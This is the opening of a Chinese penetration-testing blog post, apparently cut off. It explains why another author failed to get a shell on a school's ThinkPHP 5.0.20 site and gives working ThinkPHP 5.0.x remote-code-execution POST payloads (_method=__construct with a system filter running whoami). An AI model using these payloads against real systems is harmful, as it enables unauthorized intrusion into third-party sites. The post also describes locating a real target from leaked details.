声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 |
0x01 前言
这篇文章记录的是笔者在阅读某公众号发布的“ 记一次对****某校区失败的渗透测试 ”文章时发现存在漏点,找到目标站点并对原文章作者在Getshell时遇到的问题进行了一些测试,Getshell失败的原因他认为是Assert、Eval被禁用或者360安全防护问题,其实都不是。漏点处出在Burpsuite请求/响应包中以及****等关键字。
0x02 TP-RCE漏洞利用与杀软对比
这是一个后台登录页,基于ThinkPHP V5.0.20框架,可利用ThinkPHP 5.0.0~5.0.23 RCE漏洞直接执行系统命令,不同小版本之间利用的Payload可能会有些差别。_method=__construct&filter=system&a=whoamihttp://192.168.1.7/ThinkPHP/public/index.php?s=captchapost_poc1:_method=__construct&filter[]=system&method=get&get[]=whoamipost_poc2:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
通过与tasklist /sv